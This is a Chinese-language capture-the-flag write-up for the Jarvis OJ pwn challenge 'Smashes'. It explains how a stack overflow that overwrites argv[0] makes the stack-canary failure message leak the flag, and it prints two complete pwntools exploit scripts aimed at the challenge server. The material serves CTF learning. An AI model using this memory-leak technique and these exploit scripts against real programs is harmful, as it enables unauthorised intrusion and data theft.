[Jarvis OJ - PWN]——Smashes

• 題目地址: https://www.jarvisoj.com/challenges
• 題目:
  

還是先checksec一下看看。64位,并且除了PIE,其他保護基本都開啟了。

在IDA中看看

發現有可以利用的棧溢出, 我原本的想法是將canary給泄露出來。但是看到觸發了canary保護后的結果, 有點不對勁。

修改了文件名后,我確定了, 泄露的就是argv[0]。我們可以通過將其覆蓋, 主動觸發canary保護, 將flag拿到手。

我們首先要確實, argv[0], 距離的輸入的偏移。我們找最初的指針指向。
diantance = 0x218

上面我們找到flag的地址位:0x0000000000600D21
所以exploit

from pwn import * #p=process('./smashes') p=remote("pwn.jarvisoj.com","9877") p.recvuntil("name?"); flag_addr=0x0600D21 payload='a'*0x218+p64(flag_addr) p.sendline(payload) p.interactive()

發現結果不對,什么都沒有???

看了下相關博客,學到了

peak小知識

當ELF文件較小的時候，他的不同區段可能會被多次映射。

找到映射備份地址0x400D21

exploit

from pwn import * #p=process('./smashes') p=remote("pwn.jarvisoj.com","9877") p.recvuntil("name?"); flag_addr=0x0400D21 payload='a'*0x218+p64(flag_addr) p.sendline(payload) p.interactive()

總結

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——Smashes的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。